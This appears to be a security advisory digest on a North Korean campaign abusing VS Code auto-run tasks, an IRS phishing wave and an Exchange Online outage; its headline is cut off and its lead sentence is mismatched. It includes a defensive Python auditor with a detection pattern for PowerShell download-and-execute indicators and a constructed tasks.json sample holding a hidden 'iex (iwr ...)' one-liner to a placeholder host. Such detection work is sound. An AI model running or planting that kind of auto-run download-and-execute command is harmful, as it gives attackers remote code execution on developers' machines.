Medium Vulnerability

North Korean Hackers Abuse VS Code Auto-Run Tasks to

Microsoft is working to address an ongoing service issue that has intermittently prevented some users from accessing their cloud-based Exchange Online mailboxes via Outlook mobile and Mac desktop clie

What Happened

Microsoft has been contending with multiple, unrelated security incidents. A service change to Exchange Online caused intermittent access issues for Outlook users on mobile and Mac platforms, which the company is actively resolving. Concurrently, security researchers have identified a sophisticated campaign attributed to the North Korean threat actor group WaterPlum (also tracked as Contagious Interview). This group is distributing a malware family known as StoatWaffle by weaponizing legitimate features within Microsoft’s Visual Studio Code editor. In a separate, widespread campaign, Microsoft has warned of IRS-themed phishing emails that have already targeted approximately 29,000 users, aiming to steal credentials and deploy remote monitoring and management (RMM) malware.

Why It Matters

These incidents highlight a dual threat landscape: sophisticated nation-state espionage and high-volume, financially motivated cybercrime. The WaterPlum campaign demonstrates that advanced persistent threat (APT) groups are increasingly abusing trusted developer tools to bypass security controls, posing a significant risk to software development and IT environments. The massive IRS phishing wave exploits human psychology during tax season, threatening both individual and corporate financial security. The unrelated Exchange Online service issue, while not malicious, underscores the critical dependency organizations have on cloud email services and the operational impact of service disruptions.

Technical Details

The North Korean actors are distributing malicious Visual Studio Code configuration files (.vscode/tasks.json) that abuse the editor’s legitimate “auto-run tasks” feature. When a developer opens a compromised project, the task automatically executes a PowerShell script, leading to the deployment of the StoatWaffle malware. StoatWaffle is a downloader capable of fetching and executing additional payloads, facilitating further compromise. The IRS campaign uses convincing email lures with tax-related urgency to trick recipients into opening attachments or links. Successful phishing leads to credential harvesting or the installation of RMM tools like AnyDesk and ScreenConnect, which attackers use for persistent remote access.
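As an added defensive example (not code from the advisory or from Microsoft), the script below audits a project's `.vscode/tasks.json` for tasks configured to run on folder open (VS Code's `runOptions.runOn: "folderOpen"`) and flags those whose command line contains PowerShell or common download-and-execute indicators. The indicator list, file handling and the constructed sample are assumptions for illustration.

```python
import json
import re

# runOptions.runOn value that makes VS Code launch a task when the folder opens
AUTO_RUN = "folderOpen"
# Indicators worth a human review; this list is an assumption, not from the advisory.
SUSPICIOUS = re.compile(
    r"(?i)powershell|pwsh|-enc\w*|-w(indowstyle)?\s+hidden|bypass|\biex\b|\biwr\b"
    r"|invoke-expression|downloadstring|invoke-webrequest|curl\s|wget\s"
)
# Match JSON strings first so // inside a URL is not mistaken for a comment.
_JSONC = re.compile(r'("(?:\\.|[^"\\])*")|//[^\n]*|/\*.*?\*/', re.S)

def strip_jsonc(text: str) -> str:
    """tasks.json is JSONC: drop comments and trailing commas before parsing."""
    text = _JSONC.sub(lambda m: m.group(1) or "", text)
    return re.sub(r",(\s*[}\]])", r"\1", text)

def task_command(task: dict) -> str:
    """Flatten command plus args, including the Windows-specific override."""
    win = task.get("windows", {})
    parts = [task.get("command", ""), *task.get("args", []),
             win.get("command", ""), *win.get("args", [])]
    return " ".join(str(p) for p in parts if p)

def audit_tasks(text: str) -> list:
    """Return one finding per auto-run task; mark those matching indicators."""
    data = json.loads(strip_jsonc(text))
    findings = []
    for task in data.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != AUTO_RUN:
            continue  # runs only on demand; not the auto-run vector
        cmd = task_command(task)
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd,
                         "suspicious": bool(hits), "indicators": hits})
    return findings

# Constructed sample: a benign auto-run task beside one shaped like the described abuse.
SAMPLE = r'''{
  // constructed for illustration
  "version": "2.0.0",
  "tasks": [
    {"label": "lint", "type": "shell", "command": "npm run lint",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "setup", "type": "shell",
     "command": "powershell -w hidden -ep bypass -c \"iex (iwr https://placeholder.invalid/x)\"",
     "runOptions": {"runOn": "folderOpen"},},
  ]
}'''

if __name__ == "__main__":
    for f in audit_tasks(SAMPLE):
        print("SUSPICIOUS" if f["suspicious"] else "review    ", f["label"], f["indicators"])
```

Any auto-run task deserves review, not only flagged ones; setting VS Code's `task.allowAutomaticTasks` to `off` stops folder-open tasks from running until a user explicitly allows them.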

Immediate Risk

The risk from the WaterPlum campaign is MEDIUM. It is a targeted attack likely aimed at specific organizations for espionage purposes, rather than a broad, indiscriminate threat. However, any organization using VS Code, particularly in sectors of interest to North Korea (e.g., defense, technology, finance), could be at risk. The IRS phishing campaign presents a HIGH volume risk to the general public and employees, with a high probability of successful credential theft or initial access leading to ransomware or data theft. The Exchange Online issue is an operational nuisance with no direct security risk, but it could be exploited in social engineering attacks.

Security Insight

Security teams should treat developer environments as critical infrastructure. Implement application allowlisting to control which scripts and binaries can execute, and monitor for unusual PowerShell activity originating from code editors. For the phishing threat, reinforce user training on tax-season scams and implement strong email filtering rules for IRS-themed emails. Multi-factor authentication (MFA) is critical to mitigate the impact of stolen credentials. While these threats are not linked to specific CVEs like the recent Microsoft Bing Images Command Injection (CVE-2026-32194) or Himmelblau Authentication Bypass (CVE-2026-31957), they emphasize that threat actors will exploit any available vector, from software features to human trust.
